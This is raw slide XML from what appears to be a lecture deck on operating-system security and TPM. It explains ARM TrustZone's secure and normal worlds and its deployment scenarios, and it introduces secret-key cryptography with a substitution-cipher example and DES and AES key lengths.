                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="75" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103731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731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ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>ARM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43978029-9DF7-7445-88EF-08A8BCC03D5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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ARM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230736" y="981778"/>
            <a:ext cx="8665436" cy="2030930"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> virtualizes an ARM processor into two processors w/ hardware enforced isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Normal world for the rich OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Secure world for a restricted security code base</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43978029-9DF7-7445-88EF-08A8BCC03D5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="350808" y="2935702"/>
            <a:ext cx="8254176" cy="3880235"/>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ARM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> introduces a new secure state to the ARM architecture for both User and kernel modes. This determines whether the system is operating within the Secure or Non-Secure World. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>A new mode – Secure Monitor, controls switching between the Secure and Non-Secure World using hardware instruction SMI (Secure Monitor Interrupt).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43978029-9DF7-7445-88EF-08A8BCC03D5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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Software Viewpoint</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43978029-9DF7-7445-88EF-08A8BCC03D5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="809926" y="1228575"/>
            <a:ext cx="7581900" cy="5286375"/>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System Example</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-192504" y="1350235"/>
            <a:ext cx="4360244" cy="5762833"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> implementation consists of both secure and non-secure elements. Key components include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>secure on-chip boot ROM to configure the system,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>on-chip non-volatile or one-time programmable memory for storing device or master keys,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>secure on-chip RAM used to store and run trusted code such as DRM engines and payment agents, or to store sensitive data such as encryption keys,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>other resources, such as peripherals, that can be configured to allow access by trusted applications only.</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12/19/2012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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4010639" y="2223094"/>
            <a:ext cx="5133361" cy="3417309"/>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Deployment Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-154005" y="1350236"/>
            <a:ext cx="3830855" cy="5153114"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Three alternative security deployment scenarios. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>The normal application is shown running directly on the OS in the non-secure world. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>The e-wallet application is secure, and goes through the OS, which calls the access driver which switches to the secure world. When the kernel receives the request, the API manages the secure key storage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SIMLock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> application demonstrates how the secure operation can be enabled directly through the Trusted Interpreter, bypassing the OS completely.</a:t>
            </a:r>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12/19/2012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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2051" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3623633" y="2367815"/>
            <a:ext cx="5520367" cy="3590224"/>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12/19/2012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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="279140" y="211806"/>
            <a:ext cx="8354728" cy="3000729"/>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336891" y="3513221"/>
            <a:ext cx="8292980" cy="3046147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1867301" y="2531444"/>
            <a:ext cx="227968" cy="17325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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836821" y="5860181"/>
            <a:ext cx="227968" cy="17325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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E5A6B082-2E62-4D23-8E0E-82AB6B62A343}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344129" y="1806618"/>
            <a:ext cx="8799871" cy="4741666"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Also called private-key crypto or symmetric-key crypto: both encryption and decryption keys are kept secret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Monoalphabetic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>substitution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>letter replaced by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>a different letter. Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1047750" lvl="1" indent="-609600">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Plaintext:             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ABCDEFGHIJKLMNOPQRSTUVWXYZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1047750" lvl="1" indent="-609600">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Encryption Key:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>QWERTYUIOPASDFGHJKLZXCVBNM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Plaintext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ATTACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>QZZQEA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Given the encryption key,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>to find decryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Decryption Key: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KXVMCNOPHQRSZYIJADLEGWBUFT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:srgbClr val="660000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Pro: computationally efficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:srgbClr val="660000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Con: need to somehow distribute the shared secret key to both sender and receiver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733425" y="855770"/>
            <a:ext cx="7772400" cy="558800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Secret-Key Cryptography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encryption algorithms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Encryption Standard (DES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uses 56-bit keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modern computers can try millions of keys per second with special hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Current algorithms (AES, Blowfish) use 128 bit keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adding one bit to the key makes it twice as hard to guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At 1015 keys per second, it would require over 1000 billion years to find the key!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modern encryption isn’t usually broken by brute force…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>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684</TotalTime>
  <Words>4783</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>772</Paragraphs>
  <Slides>76</Slides>
  <Notes>28</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>76</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="77" baseType="lpstr">
      <vt:lpstr>Template</vt:lpstr>
      <vt:lpstr>Security &amp; TPM</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>The Security Environment Threats</vt:lpstr>
      <vt:lpstr>Intruders</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>Basics of Cryptography</vt:lpstr>
      <vt:lpstr>Secret-Key Cryptography</vt:lpstr>
